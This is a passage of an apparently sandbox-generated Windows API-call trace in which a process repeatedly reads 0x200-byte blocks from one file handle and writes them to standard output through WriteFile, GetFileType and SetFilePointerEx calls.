lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0146.593] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.594] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.594] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.595] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.595] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType 
(hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] GetFileType (hFile=0x50) returned 0x1 [0146.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.595] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.596] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.596] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.596] GetFileType (hFile=0x50) returned 0x1 [0146.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, 
lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.597] GetFileType (hFile=0x50) returned 0x1 [0146.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, 
lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.598] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.598] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.598] GetFileType (hFile=0x50) returned 0x1 [0146.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.599] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.599] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.599] GetFileType (hFile=0x50) returned 0x1 [0146.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 
[0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.600] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.600] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, 
lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: 
lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.602] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.602] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.603] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.603] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: 